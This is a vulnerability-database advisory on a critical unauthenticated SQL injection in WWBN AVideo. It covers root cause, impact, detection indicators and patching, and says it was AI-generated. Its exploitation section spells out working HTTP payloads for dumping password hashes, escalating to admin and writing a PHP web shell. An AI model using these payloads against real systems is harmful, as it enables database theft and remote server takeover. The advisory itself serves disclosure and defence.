
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33352 is a critical unauthenticated SQL injection vulnerability in WWBN AVideo, an open-source video streaming platform. The flaw exists in objects/category.php within the getAllCategories() method, where the doNotShowCats request parameter is insufficiently sanitized, allowing attackers to bypass the single-quote stripping defense using a backslash escape technique. All AVideo versions prior to 26.0 are affected. The vulnerability was disclosed on March 19, 2026 via GitHub Advisory GHSA-mcj5-6qr4-95fj and published to NVD on March 23, 2026. It carries a CVSS v3.1 base score of 9.8 (Critical) (GitHub Advisory).
The root cause is improper neutralization of SQL special elements (CWE-89) in objects/category.php at lines 386–394. The only sanitization applied is str_replace("'", '', $value), which strips single quotes but does not strip backslashes. MySQL treats \ as an escape character inside string literals by default, so an attacker can send doNotShowCats[0]=\ and doNotShowCats[1]=) OR 1=1)-- -; the backslash in element 0 escapes the closing single-quote added by implode(), shifting the SQL string boundary and making element 1 executable SQL. The parameter is also absent from all global input filters defined in objects/security.php, and values are concatenated directly into the SQL query via implode() rather than using parameterized queries. UNION-based data extraction is possible by matching the column count of the original SELECT, e.g., doNotShowCats[1]=)) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- - (GitHub Advisory).
Successful exploitation grants an unauthenticated remote attacker full read access to the entire database, including user credentials, email addresses, private video metadata, API secrets, and plugin configuration. Integrity is fully compromised — attackers can modify or delete any database record, including escalating privileges via UPDATE users SET isAdmin=1. Availability is also at risk, as attackers can drop tables or corrupt data. On MySQL configurations that permit SELECT ... INTO OUTFILE, the attacker could write a PHP web shell to the server's document root, achieving remote code execution (GitHub Advisory, Feedly).
A public proof-of-concept exploit is available in the GitHub security advisory, providing concrete HTTP GET request payloads with specific URL-encoded parameters that can be executed directly against a vulnerable AVideo instance (GitHub Advisory). No authentication or user interaction is required, and attack complexity is low. As of the time of reporting, there is no confirmed evidence of in-the-wild exploitation, and no threat actor attribution has been made. The EPSS score is approximately 0.029% (0.000290), indicating a currently low but non-negligible probability of exploitation in the near term. The vulnerability is not listed in the CISA KEV catalog. Qualys scanner (detection ID 5009469) has added detection for this CVE (Feedly).
/categories.json.php endpoint.GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=%29%20OR%201%3D1%29--%20- and observe whether the response returns all categories (indicating the injected OR 1=1 evaluated to true).GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20- to retrieve usernames and password hashes from the users table.UPDATE users SET isAdmin=1 WHERE user='attacker', to gain administrative access to the AVideo platform.SELECT ... INTO OUTFILE is enabled and secure_file_priv is not restrictive, write a PHP web shell to the document root: SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/AVideo/shell.php', then access it via HTTP to execute OS commands (GitHub Advisory)./categories.json.php containing doNotShowCats parameters with backslash characters (\), URL-encoded SQL keywords (UNION, SELECT, OR, FROM), or comment sequences (--); outbound connections from the web server to unexpected external hosts (potential RCE indicator)./categories.json.php with array-style parameters (doNotShowCats[0], doNotShowCats[1]) and encoded payloads; anomalous response sizes from /categories.json.php that differ significantly from baseline (indicating data exfiltration via UNION).shell.php, cmd.php) appearing in the AVideo document root or subdirectories, particularly if MySQL INTO OUTFILE was leveraged for RCE.isAdmin flag set to 1 for non-admin accounts); unusual or unauthorized admin accounts created; database audit logs showing UNION SELECT queries or UPDATE/DROP statements originating from the web application user (GitHub Advisory).Upgrade AVideo to version 26.0 or later, which contains the patch for this vulnerability (GitHub Advisory). The fix replaces string concatenation with parameterized queries using placeholder binding, or at minimum applies $global['mysqli']->real_escape_string() to each value. As interim mitigations: restrict access to /categories.json.php via web server rules (e.g., block requests with doNotShowCats parameters containing backslashes); disable MySQL's INTO OUTFILE capability by setting secure_file_priv to a restricted or non-web-accessible directory to prevent RCE escalation; and apply network segmentation to limit direct database access. Monitor database activity for anomalous queries as a detective control (GitHub Commit).
The vulnerability received coverage from security news outlets including The Hacker Wire, which published an article titled "Critical Unauthenticated SQLi in WWBN AVideo" (The Hacker Wire). Security community discussion was noted on Mastodon and Bluesky shortly after the NVD publication on March 23, 2026. Security Online Info also covered the broader set of critical AVideo vulnerabilities (Security Online). The advisory was also picked up by threat intelligence aggregators including VulDB, CVEFeed, and Qualys, which added scanner detection.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."